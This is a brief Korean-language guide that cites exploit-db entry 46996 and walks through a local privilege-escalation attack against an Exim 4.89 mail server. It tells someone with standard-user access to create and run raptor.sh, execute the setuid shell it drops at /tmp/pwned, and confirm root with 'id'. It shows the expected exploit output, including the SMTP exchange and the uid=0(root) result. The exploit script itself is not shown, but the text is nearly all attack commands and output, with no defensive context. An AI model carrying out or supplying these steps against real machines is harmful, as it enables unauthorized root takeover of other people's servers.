
Cr.Link: https://www.exploit-db.com/exploits/46996
#1.이 방법은 먼저 표준 사용자 권한으로 대상 머신에 접근해야 합니다.
#2.대상 머신에 접근한 후, 다음 내용으로 스크립트 파일을 생성합니다:
vi raptor.sh
#3.제공된 'raptor.sh' 파일에서 코드를 복사합니다. 그런 다음 아래 명령으로 파일을 실행합니다:
chmod +x raptor.sh
./raptor.sh
#4.아래 예시와 유사한 출력이 표시됩니다:
Preparing setuid shell helper...
Delivering payload...
220 machine-noob
ESMTP Exim 4.89 Wed, 03 Dec 2025 08:29:29 +0000
250 machine-noob
Hello localhost [127.0.0.1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1vQiEr-00001R-7t
221 machine-noob
closing connection
Waiting 5 seconds for Exim to execute payload...
-rwsr-xr-x 1 root noob 8392 Dec 3 08:29 /tmp/pwned
#5.그런 다음 아래 명령을 실행합니다:
/tmp/pwned
#6.그런 다음 'id' 명령을 실행해 보세요. 다음 결과가 표시된다면:
uid=0(root) gid=0(root) groups=0(root),1001(noob)